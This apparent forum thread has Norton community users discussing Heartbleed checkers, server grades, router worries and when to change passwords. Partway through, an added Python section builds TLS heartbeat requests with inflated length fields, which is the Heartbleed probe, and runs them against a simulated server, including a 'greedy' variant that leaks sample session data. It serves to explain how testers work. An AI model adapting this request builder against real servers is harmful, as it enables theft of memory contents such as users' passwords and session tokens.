"I went through a lot of effort to implement a test that verifies the problem without retrieving any bytes from the server, other than the bytes we send in the heartbeat request. So it should be safe to use."
The Qualys SSL Server Test was recently updated to check for the Heartbleed vulnerability in OpenSSL, but the overall test score (ranging from A to F) appears to be based on multiple configuration settings for the SSL web server, and not just this OpenSSL vulnerability.
The Norton forum can be accessed with two different URLs - via a standard HTTP protocol (http://community.norton.com/) or via a partially encrypted HTTP Secure protocol (https://community.norton.com/) which signals your browser to use an added encryption layer of SSL/TLS to create a secure channel between your browser and the web server. I'm guessing that community.norton.com is given a score of A- because the Qualys test defaults to the HTTP Secure (https://) connection, although I could be completely wrong about that.
----------- MS Windows 32-bit Vista Home Premium SP2 * Firefox 28.0 * IE 9.0 * NIS 2013 v. 20.4.0.40 HP Pavilion dv6835ca, Intel Core2Duo CPU T5550 @ 1.83 GHz, 3.0 GB RAM, NVIDIA GeForce 8400M GS
Just out of curiosity, I tried the tester at https://www.ssllabs.com/ssltest/index.html with norton.com. It took 30-40 seconds to report back on 3 servers with inconsistent results & an F grade on one. So on a whim I entered www.ssllabs.com and it came back in less than a second with a list of 5 servers, all ranked A+... Yeah, right.
Yes I said norton.com and symantec.com both got an F rating, but it said they were NOT vulnerable to the Heartbleed attack.
Ok, so you don't think that is a valid tester? I just thought he was doing a lot more thorough testing, but I'm no security expert.
Hi gtalbot:
If you want to re-run the test for www.ssllabs.com from scratch you have to click the Clear Cache link. Testing all 5 IP addresses for that URL took about 5 minutes on my computer.
I've no idea but I would not go around checking websites to see if they are OK -- I'd let the professional security people do it with their protected systems.
Hey, I just thought of something that may be totally off the mark. Chances are that in most cases we'll need to change our website passwords. I know this sounds crazy and probably is, but does this whole SSL thing also affect our routers connecting to the internet? I mean, that is encrypted, right? So is that compromised too?
If you change the ISP master account password, the systems using that account to connect have to be updated in the control panel etc., since each system (computer) using automatic login with a saved password will keep trying to connect to the network with the old password, which should return an error or failure (wrong username or password).
Ok, so my ISP is timewarnercable, but when I put that in the tester I can get a real reading. Plus, I'm not sure what website my router goes to when connecting to the server for internet service. My guess is that it would be different than the server for paying my bill.
Hi Calls:
The Sophos article recommended by F4E in message # 25 (and again in message # 46) might address some of your concerns. That article suggests that users hold off changing their login passwords until the company hosting the login page either confirms that you were never in danger (i.e., they did not use OpenSSL protocol on their https:// server) or they have patched their OpenSSL software and re-issued their security certificates. The assumption is that there has likely been an upswing in the number of hackers trying to exploit this Heartbleed vulnerability since it was announced this week, and if you change your password on a server that is still vulnerable you're just increasing your chances of having your new password stolen.
I can't blame anyone for being proactive and using one of the public Heartbleed test sites to check the security of various servers using the HTTP Secure (https://) protocol, but some of these public test sites were thrown together very quickly and are still being revised on a daily basis to work out the bugs. I noticed the Heartbleed test at http://filippo.io/Heartbleed/, for example, has now been updated to give the user the option to check/ignore security certificates on the site. The Sophos article here also cautions that testing a website for "heartbleed" could give an incomplete answer if the company outsources operation of their servers to a third-party mirror site. Users should also be cautioned that most web pages use the standard HTTP protocol (http://) and you should always assume that data shared on an http:// site is insecure - the public Heartbleed test sites were designed to check the security of HTTP Secure (https://) sites using the SSL/TLS protocol for secure login, payment and banking transactions.
I'm very disappointed that Symantec still hasn't posted information in the Norton Toolbar / Norton Identity Safe board to let Norton customers know if the server(s) used for storing encrypted Identity Safe login passwords (i.e., the online vault) use the OpenSSL protocol.
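The tester quoted at the top of this thread ("without retrieving any bytes from the server, other than the bytes we send in the heartbeat request") and the public test sites discussed in the post above all rely on the same mechanism: a TLS heartbeat request (RFC 6520) whose declared payload length is larger than the payload actually sent. An unpatched OpenSSL trusts that field and echoes back that many bytes from its memory; OpenSSL 1.0.1g drops any request whose declared length does not fit in the record. The following Python is an added example, not code from this thread, from the filippo.io tester, or from OpenSSL. It builds a real heartbeat record, models both the vulnerable and the patched server behaviour in a constructed `simulate_server` function (the `adjacent_memory` bytes stand in for whatever follows the record in the server's heap and are made up here), and classifies the reply. The "padding-only" probe in `probe()` is my reading of how a checker can prove the bug without pulling server memory: it asks only for our own payload plus our own 16 padding bytes, which a patched server refuses and an unpatched one returns.

```python
import struct
from typing import Optional, Tuple

# Constants from RFC 6520 (TLS Heartbeat extension)
HEARTBEAT_CONTENT_TYPE = 0x18   # TLS record content type for heartbeat messages
HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
MIN_PADDING = 16                # a heartbeat message must carry at least 16 bytes of padding
TLS_VERSION = (3, 1)            # TLS 1.0 record version; the value is irrelevant here


def tls_record(body: bytes) -> bytes:
    """Wrap a heartbeat message in a TLS record header (type, version, length)."""
    return struct.pack("!BBBH", HEARTBEAT_CONTENT_TYPE, TLS_VERSION[0], TLS_VERSION[1], len(body)) + body


def build_heartbeat_request(payload: bytes, claimed_length: Optional[int] = None) -> bytes:
    """Build a heartbeat_request record.

    claimed_length defaults to the real payload size (a well-formed request). Declaring a
    larger value is the Heartbleed probe: an unpatched server believes the field and copies
    claimed_length bytes from its receive buffer into the reply.
    """
    if claimed_length is None:
        claimed_length = len(payload)
    return tls_record(struct.pack("!BH", HEARTBEAT_REQUEST, claimed_length) + payload + b"\x00" * MIN_PADDING)


def parse_heartbeat_record(record: bytes):
    """Return (message_type, declared_payload_length, bytes_after_header), or None if not a heartbeat record."""
    if len(record) < 8:
        return None
    ctype, _vmaj, _vmin, rlen = struct.unpack("!BBBH", record[:5])
    if ctype != HEARTBEAT_CONTENT_TYPE or len(record) != 5 + rlen:
        return None
    msg_type, plen = struct.unpack("!BH", record[5:8])
    return msg_type, plen, record[8:]


def simulate_server(request: bytes, patched: bool, adjacent_memory: bytes) -> Optional[bytes]:
    """Constructed model of a server's heartbeat handling (an assumption for this example, not OpenSSL code).

    adjacent_memory is made-up heap content that follows the record in the server's memory.
    Unpatched: trust the declared length (CVE-2014-0160). Patched (1.0.1g): discard any
    request whose declared length plus minimum padding does not fit in the record.
    """
    parsed = parse_heartbeat_record(request)
    if parsed is None or parsed[0] != HEARTBEAT_REQUEST:
        return None
    _, plen, body = parsed
    if patched:
        if plen + MIN_PADDING > len(body):
            return None                               # silently discarded, as the fix does
        echoed = body[:plen]
    else:
        echoed = (body + adjacent_memory)[:plen]      # over-read: runs past what the client sent
    return tls_record(struct.pack("!BH", HEARTBEAT_RESPONSE, plen) + echoed + b"\x00" * MIN_PADDING)


def classify_response(sent_payload: bytes, response: Optional[bytes]) -> Tuple[str, bytes]:
    """Decide vulnerability from the reply to a probe whose declared length was inflated.

    Returns (verdict, bytes echoed beyond our payload). With the padding-only probe the
    second element is just the 16 padding bytes we sent, so no server memory is retrieved.
    """
    if not response:
        return "not vulnerable", b""
    parsed = parse_heartbeat_record(response)
    if parsed is None or parsed[0] != HEARTBEAT_RESPONSE:
        return "not vulnerable", b""
    _, plen, body = parsed
    if not body.startswith(sent_payload):
        return "inconclusive", b""
    if plen > len(sent_payload) and len(body) >= plen:
        return "vulnerable", body[len(sent_payload):plen]
    return "not vulnerable", b""


def probe(patched: bool, adjacent_memory: bytes, leak_extra: int = 0) -> Tuple[str, bytes]:
    """Run one probe against the simulated server.

    leak_extra=0 asks only for our payload plus our own 16 padding bytes: an unpatched server
    still answers (a patched one drops the request), but the reply contains no server memory.
    A positive leak_extra shows what a careless tester would pull out of the server.
    """
    payload = b"hb-check"                           # constructed probe payload
    claimed = len(payload) + MIN_PADDING + leak_extra
    response = simulate_server(build_heartbeat_request(payload, claimed), patched, adjacent_memory)
    return classify_response(payload, response)


if __name__ == "__main__":
    heap = b"session=abc123; password=hunter2"     # constructed sample of adjacent server memory
    print("padding-only probe, unpatched:", probe(False, heap))
    print("padding-only probe, patched:  ", probe(True, heap))
    print("greedy probe, unpatched:      ", probe(False, heap, leak_extra=32))
```

The padding-only probe is the one to prefer when checking a site you do not own: it distinguishes patched from unpatched servers but never carries anyone else's session data back to the tester. Note that "not vulnerable" here also covers servers that simply do not speak the heartbeat extension at all, which is why the public testers report non-OpenSSL stacks as safe.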
Some information/speculation about the router question in this BBC article: http://m.bbc.com/news/technology-26985818 (posted in Calls’ thread, but thought it might be useful here, too)
https://ssltools.websecurity.symantec.com/checker/ This is Symantec's own SSL certificate check tool. I entered Norton.com. See screenshot for the results. On the one hand, it says that the "server is not vulnerable to the Heartbleed attack." On the other hand, it says "Certificate installation check failed." Not sure what to make of this.
Okay. Instead of just entering Norton.com this time, I added the "www." before it and I got this. Although this time the certificate installation check was successful, I'm still seeing the orange exclamation mark. Plus, under Common Name, the sub-domain names in the above screenshot and the ones here don't seem to overlap. For example, account.norton.com appears in the "failed" screenshot but not in the "successful" one. Does this mean account.norton.com's SSL certificate has not yet been patched? So many questions...